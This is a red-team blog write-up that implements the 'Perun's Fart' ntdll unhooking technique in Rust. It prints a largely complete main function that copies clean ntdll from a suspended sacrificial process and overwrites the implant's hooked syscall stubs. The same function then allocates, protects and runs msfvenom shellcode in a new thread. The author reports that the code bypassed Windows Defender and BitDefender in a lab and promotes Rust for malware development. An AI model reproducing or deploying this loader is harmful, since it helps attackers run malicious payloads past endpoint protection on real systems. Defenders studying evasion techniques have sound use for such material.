I've recently continued to explore the capabilities of Rust, and I decided to take on a challenge: implement Perun's Fart in Rust. Though this is not a novel technique, its implementation in Rust brings a new capability to the offensive toolset.
If you're not familiar with Perun's Fart, the methodology goes like this:
Execute implant.exe -> CreateProcess (Suspended) -> steal unhooked ntdll.dll from suspended process -> overwrite hooked syscall table in the memory of implant.exe -> execute malicious code
This technique is powerful because it lets us unhook our implant without producing an overly large PE file, as the byoDLL technique does, and it does not require access to the copy of ntdll on disk. The technique is fairly well documented in other languages, so without further ado, let's look at the implementation in Rust.
Part Two: The Code
The code is fairly lengthy and can be found in its entirety on my GitHub, but the main function is below for easy reference. It should be fairly straightforward to associate the code below with the methodology outlined above.
fnmain() {letmut garbage =String::from("\0");letmut attrsize:usize=Default::default();letmut old_protect = PAGE_EXECUTE_READ;let pDosHdr:*const IMAGE_DOS_HEADER;let pNtHdr:*const IMAGE_NT_HEADERS64;let pOptHdr: IMAGE_OPTIONAL_HEADER64;unsafe{let sacrificialProcess =b"cmd.exe\0";let initProcess =b"C:\\Windows\\System32\0";letmut pi:PROCESS_INFORMATION = mem::zeroed();letmut si:STARTUPINFOEXA = mem::zeroed(); si.lpAttributeList = HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS, attrsize) as LPPROC_THREAD_ATTRIBUTE_LIST;
si.StartupInfo.cb = mem::size_of::<STARTUPINFOA>() asu32;InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &mut attrsize);//create sacrificial processCreateProcessA(0as*constu8, sacrificialProcess.as_ptr() as*mutu8,0as*const SECURITY_ATTRIBUTES,0as*const SECURITY_ATTRIBUTES,falseasi32, CREATE_NEW_CONSOLE | CREATE_SUSPENDED,0as*const c_void, initProcess as*constu8,&mut si.StartupInfo,&mut pi );//get base addr of ntdll in memorylet pNtdllAddr =GetModuleBaseAddr("ntdll.dll");//map ntdll pDosHdr = pNtdllAddr as*mut IMAGE_DOS_HEADER; pNtHdr = (pNtdllAddr asu64+ (*pDosHdr).e_lfanew asu64) as*mut IMAGE_NT_HEADERS64; pOptHdr = (*pNtHdr).OptionalHeader;//find first image section let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 +IMAGE_SIZEOF_FILE_HEADER as u64+(*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as * const IMAGE_SECTION_HEADER;
let target_section = [46, 116, 101, 120, 116, 0, 0, 0]; //.text//find text section of ntdll in memory let mut ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64)) as * const IMAGE_SECTION_HEADER;
for n in0..((*pNtHdr).FileHeader.NumberOfSectionsasu64){ ntdll_addr = (pCacheImgSectionHead as u64 + (IMAGE_SIZEOF_SECTION_HEADER as u64 * n)) as * const IMAGE_SECTION_HEADER;
if (*ntdll_addr).Name== target_section{ break; } }let ntdll_size = pOptHdr.SizeOfImageasusize;//create cachelet pCache =VirtualAlloc(0as*const c_void, ntdll_size, MEM_COMMIT, PAGE_READWRITE);//read sacrificial process ntdll.dlllet bytesRead =0as*mutusize;ReadProcessMemory( pi.hProcess, pNtdllAddr as*mut c_void, pCache, ntdll_size, bytesRead );println!("pCache: {:?}", pCache);println!("pCache size: {:?}", ntdll_size);stdin().read_line(&mut garbage).ok();//kill sacrificial processTerminateProcess(pi.hProcess, 0);println!("\nRemove hooks?\n");stdin().read_line(&mut garbage).ok();//unhook ntdll.dllUnhook(ntdll_addr as*mut c_void, pCache as*const c_void);VirtualFree(pCache,0,MEM_RELEASE);println!("Unhooking complete, run payload?");stdin().read_line(&mut garbage).ok(); }//msfvenom calclet payload : [u8;276] = […snip…];unsafe{//println!("allocating payload mem");//allocate payload memlet payload_addr =VirtualAlloc(0as*const c_void, payload.len(), MEM_COMMIT, PAGE_READWRITE);//println!("copying payload into mem");//copy payload std::ptr::copy(payload.as_ptr() as _, payload_addr, payload.len());//println!("restoring payload mem permissions");//change payload permissionsVirtualProtect( (payload_addr) as*const c_void, payload.len(), PAGE_EXECUTE_READ,&mut old_protect );//println!("creating thread");let thread_fn = std::mem::transmute (payload_addr as*constu32);//create thread//thread_fn();let thread =CreateThread(null_mut(),0, thread_fn, null_mut(), 0, null_mut());WaitForSingleObject(thread, u32::MAX); }}
Part Three: Differences
In terms of programmatic logic, there are no significant differences between the Rust implementation and implementations of this method in C, C++, or C#. However, due to the tight type control that Rust places on variables, there are significantly more type conversions in the code above than I'm personally used to seeing.
Additionally, at the time of writing, the windows_sys API's ability to parse the PE headers is not as robust or as well documented as it is in other languages. For example, in the code above it was necessary to manually add the size of the signature block into the traversal:
Rust Code:
let pCacheImgSectionHead = (pNtHdr as u64 + mem::size_of_val(&(*pNtHdr).Signature) as u64 + IMAGE_SIZEOF_FILE_HEADER as u64 + (*pNtHdr).FileHeader.SizeOfOptionalHeader as u64) as *const IMAGE_SECTION_HEADER;
It might be possible to re-type a variable using the IMAGE_SECTION_HEADER0 type in the windows-sys API, but the limited documentation on this mechanic made the solution above more viable at the time of writing.
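The offset arithmetic above follows directly from the PE layout: the NT headers start at e_lfanew, followed by a 4-byte signature, a 20-byte file header, and an optional header whose size is recorded in the file header. As a minimal sketch, assuming the image has already been copied into an ordinary byte buffer, the same walk can be done with bounds-checked slice reads instead of raw pointer casts. The function names and constants here (first_section_offset, find_section, and so on) are hypothetical helpers for illustration, not part of windows-sys or the original code.

```rust
// Offsets and sizes fixed by the PE/COFF format.
const E_LFANEW_OFFSET: usize = 0x3C; // DOS header field holding the NT header offset
const SIGNATURE_SIZE: usize = 4; // "PE\0\0"
const FILE_HEADER_SIZE: usize = 20; // same value as IMAGE_SIZEOF_FILE_HEADER
const SECTION_HEADER_SIZE: usize = 40; // same value as IMAGE_SIZEOF_SECTION_HEADER

/// Reads a little-endian u16 at `off`, or None if out of bounds.
fn read_u16(buf: &[u8], off: usize) -> Option<u16> {
    let b = buf.get(off..off.checked_add(2)?)?;
    Some(u16::from_le_bytes([b[0], b[1]]))
}

/// Reads a little-endian u32 at `off`, or None if out of bounds.
fn read_u32(buf: &[u8], off: usize) -> Option<u32> {
    let b = buf.get(off..off.checked_add(4)?)?;
    Some(u32::from_le_bytes([b[0], b[1], b[2], b[3]]))
}

/// Returns the byte offset of the first section header:
/// e_lfanew + signature + file header + SizeOfOptionalHeader.
fn first_section_offset(image: &[u8]) -> Option<usize> {
    let nt = read_u32(image, E_LFANEW_OFFSET)? as usize;
    let sig = image.get(nt..nt.checked_add(SIGNATURE_SIZE)?)?;
    if sig != &b"PE\0\0"[..] {
        return None;
    }
    let file_header = nt + SIGNATURE_SIZE;
    // SizeOfOptionalHeader sits 16 bytes into the file header.
    let opt_size = read_u16(image, file_header + 16)? as usize;
    Some(file_header + FILE_HEADER_SIZE + opt_size)
}

/// Returns the byte offset of the section header whose 8-byte name matches.
fn find_section(image: &[u8], name: &[u8; 8]) -> Option<usize> {
    let first = first_section_offset(image)?;
    let nt = read_u32(image, E_LFANEW_OFFSET)? as usize;
    // NumberOfSections sits 2 bytes into the file header.
    let count = read_u16(image, nt + SIGNATURE_SIZE + 2)? as usize;
    (0..count)
        .map(|i| first + i * SECTION_HEADER_SIZE)
        .find(|&off| image.get(off..off + 8) == Some(&name[..]))
}
```

Calling find_section(&image, b".text\0\0\0") mirrors the target_section comparison in the main function. Working on a slice trades a copy for bounds checking, so a truncated or malformed header yields None rather than an invalid read.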
This issue, combined with my limited understanding of Rust's memory mechanics, made it difficult to implement the memory manipulations in the fluid manner that I initially expected.
For example, in FindFirstSyscallFunction, which is used to locate the first bytes of the syscall table, we search for the bytes in the following manner:
for n in 0..(memSize - 3) as u64 {
    if *((memAddr as u64 + n) as PSTR) == pattern1[0] {
        if *((memAddr as u64 + n + 1) as PSTR) == pattern1[1] {
            if *((memAddr as u64 + n + 2) as PSTR) == pattern1[2] {
                offset = n;
                break;
            }
        }
    }
}
This clumsy approach was the only manner in which I was able to retain the types necessary to conduct an adequate byte comparison. There is definitely a more idiomatic approach to solving this problem, and I welcome you to implement a better solution.
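One more idiomatic option, offered as a sketch rather than a drop-in replacement, is to treat the region as a byte slice and let the standard library's windows iterator do the comparison. The helper name find_pattern is hypothetical, and the sketch assumes the bytes are already available as a &[u8].

```rust
/// Returns the offset of the first occurrence of `pattern` in `haystack`,
/// or None if it does not occur.
fn find_pattern(haystack: &[u8], pattern: &[u8]) -> Option<usize> {
    // `windows(0)` panics, so treat an empty pattern as "not found".
    if pattern.is_empty() {
        return None;
    }
    haystack
        .windows(pattern.len()) // every contiguous run of pattern.len() bytes
        .position(|window| window == pattern)
}
```

This removes the nested if statements and the per-byte casts, works for patterns of any length, and also checks the final window, which a loop bounded by memSize - 3 would skip. For a raw address and length, the slice could be built with std::slice::from_raw_parts inside an unsafe block, on the assumption that the whole region is readable for the lifetime of the slice.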
Part Four: ???
[Intentionally left blank]
Part Five: Profit
Upon compiling and executing the code in our target environment, we're able to validate that our approach works as designed. Even better, we can use a standard msfvenom calc payload without any modifications inside of our executable and still bypass detection by Windows Defender and BitDefender in the lab environment.
[Figure: Hooked NtCreateThread]
[Figure: Unhooked NtCreateThread]
[Figure: Payload execution]
Part Six: Conclusion
In this writeup, we saw an overview of a Rust implementation of the Perun's Fart unhooking technique. We successfully unhooked our copy of ntdll in memory and then executed our payload, validating the stability of our approach.
We also saw how Rust requires a significantly more deliberate approach to variable types and memory manipulations than other languages, and some of the issues that this can cause for developers migrating to Rust.
Overall, the language is definitely viable for malware development and remains less detectable than similar C++ or C implementations of the same program. Personally, I will continue to explore the capabilities of Rust, but C and C++ will continue to be my primary development languages.
A special thanks to @0x4d5a for the help in developing the code discussed in this writeup. They have a solid set of offensive coding courses available at: https://redteamsorcery.teachable.com/